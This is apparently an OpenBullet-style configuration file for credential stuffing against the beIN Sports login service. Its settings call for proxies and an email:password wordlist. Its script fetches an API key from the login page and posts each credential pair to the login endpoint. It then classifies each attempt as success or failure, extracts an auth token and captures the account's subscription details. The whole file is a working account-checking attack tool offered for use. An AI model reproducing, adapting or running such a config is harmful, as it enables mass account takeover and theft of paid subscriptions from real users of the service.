[SETTINGS]
{
  "Name": "BeinSports",
  "SuggestedBots": 50,
  "LastModified": "2018-07-12T22:47:13.5224918+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_DATA REQUEST GET "https://connect.bein.net/en/login/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_KEY PARSE "<SOURCE>" LR "proxies-beinmena.portail.alphanetworks.be\/proxy\/\",\"alpha_key\":\"" "\"" Recursive=FALSE -> VAR "KEY" "" "" 
#REQUEST_LOGIN REQUEST POST "https://proxies-beinmena.portail.alphanetworks.be/proxy/login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-AN-WebService-IdentityKey: <KEY>" 
  HEADER "Referer: https://connect.bein.net/en/login/" 
  HEADER "Origin: https://connect.bein.net" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "status\":false" 
  KEYCHAIN Success OR 
    KEY "status\":true" 
PARSE "<SOURCE>" JSON "newAuthToken" Recursive=FALSE -> VAR "TOKEN" "" "" 
REQUEST GET "https://connect.bein.net/en/current-subscriptions/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "\"dts_reference\" value=\"" "\"" Recursive=FALSE -> CAP "SUBSCRIPTIONS" "" "" 
